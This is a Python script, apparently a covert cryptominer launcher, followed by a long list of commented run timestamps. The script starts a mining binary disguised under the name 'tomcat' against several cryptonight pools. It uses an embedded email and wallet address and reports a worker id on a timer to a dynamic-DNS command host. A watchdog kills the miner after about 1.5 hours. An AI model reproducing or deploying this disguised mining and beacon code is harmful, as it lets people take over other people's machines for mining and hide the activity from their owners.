import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:07.102325
#2018-02-17 16:22:06.594475
#2018-02-17 18:11:05.669141
#2018-02-17 19:59:01.648440
#2018-02-17 21:48:01.758136
#2018-02-17 23:32:06.970198
#2018-02-18 01:21:01.927813
#2018-02-18 03:08:05.369665
#2018-02-18 04:55:07.589491
#2018-02-18 06:47:06.247823
#2018-02-18 08:37:05.065487
#2018-02-18 10:23:01.600570
#2018-02-18 12:09:03.591672
#2018-02-18 13:54:06.761066
#2018-02-18 15:45:07.192767
#2018-02-18 17:36:06.643767
#2018-02-18 19:24:04.472077
#2018-02-18 21:09:05.928665
#2018-02-18 22:56:05.572785
#2018-02-19 00:45:08.816321
#2018-02-19 02:32:01.578190
#2018-02-19 04:18:05.822290
#2018-02-19 06:03:03.708477
#2018-02-19 07:51:07.187303
#2018-02-19 09:41:07.706453
#2018-02-19 11:32:08.818782
#2018-02-19 13:19:05.331662
#2018-02-19 15:06:04.010198
#2018-02-19 16:53:03.862091
#2018-02-19 18:39:08.276484
#2018-02-19 20:28:02.222249
#2018-02-19 22:15:04.169473
#2018-02-20 00:02:06.016435
#2018-02-20 01:49:03.702605
#2018-02-20 03:39:06.819010
#2018-02-20 05:25:08.360132
#2018-02-20 07:10:01.554552
#2018-02-20 08:55:03.911738
#2018-02-20 10:39:04.101868
#2018-02-20 12:25:09.231562
#2018-02-20 14:13:04.682305
#2018-02-20 15:57:06.526783
#2018-02-20 17:43:02.033378
#2018-02-20 19:33:01.751261
#2018-02-20 21:21:07.339471
#2018-02-20 23:05:02.544635
#2018-02-21 00:49:04.214272
#2018-02-21 02:34:07.178629
#2018-02-21 04:22:07.406827
#2018-02-21 06:09:03.764164
#2018-02-21 07:55:17.502199
#2018-02-21 09:41:03.811412
#2018-02-21 11:29:05.751550
#2018-02-21 13:18:01.257971
#2018-02-21 15:03:04.492787
#2018-02-21 16:53:04.908367
#2018-02-21 18:43:02.094658
#2018-02-21 20:32:01.890670
#2018-02-21 22:18:05.927438
#2018-02-22 00:08:01.518598
#2018-02-22 01:55:09.351608
#2018-02-22 03:42:06.867347
#2018-02-22 05:29:03.690787
#2018-02-22 07:14:04.651309
#2018-02-22 09:02:07.329411
#2018-02-22 10:50:01.456455
#2018-02-22 12:36:02.051655
#2018-02-22 14:23:03.684815
#2018-02-22 16:12:07.954192
#2018-02-22 17:57:05.005664
#2018-02-22 19:44:09.747797
#2018-02-22 21:34:05.052132
#2018-02-22 23:21:06.821253
#2018-02-23 01:09:07.214257
#2018-02-23 02:56:07.887530
#2018-02-23 04:45:07.320438
#2018-02-23 06:32:05.898589
#2018-02-23 08:21:06.379690
#2018-02-23 10:36:07.998371
#2018-02-23 12:28:06.876902
#2018-02-23 14:17:10.942121
#2018-02-23 16:07:07.145230
#2018-02-23 17:53:04.697632
#2018-02-23 19:40:07.475317
#2018-02-23 21:23:06.020260
#2018-02-23 23:11:04.079026
#2018-02-24 00:52:01.900286
#2018-02-24 02:43:07.494752
#2018-02-24 05:27:04.045811
#2018-02-24 07:14:06.350888
#2018-02-24 09:18:08.267852
#2018-02-24 11:13:07.128234
#2018-02-24 13:02:05.193583
#2018-02-24 14:49:05.446400
#2018-02-24 16:41:08.145340
#2018-02-24 18:30:03.296086
#2018-02-24 20:17:01.256522
#2018-02-24 22:09:04.487404
#2018-02-25 02:27:01.880351
#2018-02-25 06:06:06.015633
#2018-02-25 11:38:06.784945